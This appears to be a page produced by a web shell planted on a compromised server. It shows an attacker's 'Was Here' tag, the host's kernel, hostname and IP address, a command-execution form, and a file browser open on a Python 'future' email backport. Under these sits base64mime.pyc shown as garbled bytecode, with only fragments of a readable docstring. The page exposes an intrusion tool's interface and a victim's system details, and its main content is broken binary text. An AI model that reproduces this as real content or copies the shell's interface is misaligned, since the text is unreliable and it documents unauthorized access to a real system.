Graybyt3 Was Here
Linux cloud.locucionar.com 3.10.0-1160.81.1.el7.x86_64 #1 SMP Fri Dec 16 17:29:43 UTC 2022 x86_64
Apache
91.191.211.241
/
lib
/
python2.7
/
site-packages
/
future
/
backports
/
email
[ HOME ]
Exec
Submit
base64mime.pyc
� ,�]c @` s� d Z d d l m Z d d l m Z d d l m Z d d l m Z d d l m Z d d d d d d g Z d d l m Z d d l m Z m Z d Z d Z d Z d Z d � Z d d � Z d e d � Z d � Z e Z e Z d S( u� Base64 content transfer encoding per RFCs 2045-2047. This module handles the content transfer encoding method defined in RFC 2045 to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit characters encoding known as Base64. It is used in the MIME standards for email to attach images, audio, and text using some 8-bit character sets to messages. This module provides an interface to encode and decode both headers and bodies with Base64 encoding. RFC 2045 defines a method for including character set information in an `encoded-word' in a header. This method is commonly used for 8-bit real names in To:, From:, Cc:, etc. fields, as well as Subject: lines. This module does not do the line wrapping or end-of-line character conversion necessary for proper internationalized headers; it only does dumb encoding and decoding. To deal with the various line wrapping issues, use the email.header module. i ( t unicode_literals( t division( t absolute_import( t range( t bytesu body_decodeu body_encodeu decodeu decodestringu header_encodeu header_length( t b64encode( t b2a_base64t a2b_base64u u u i c C` s<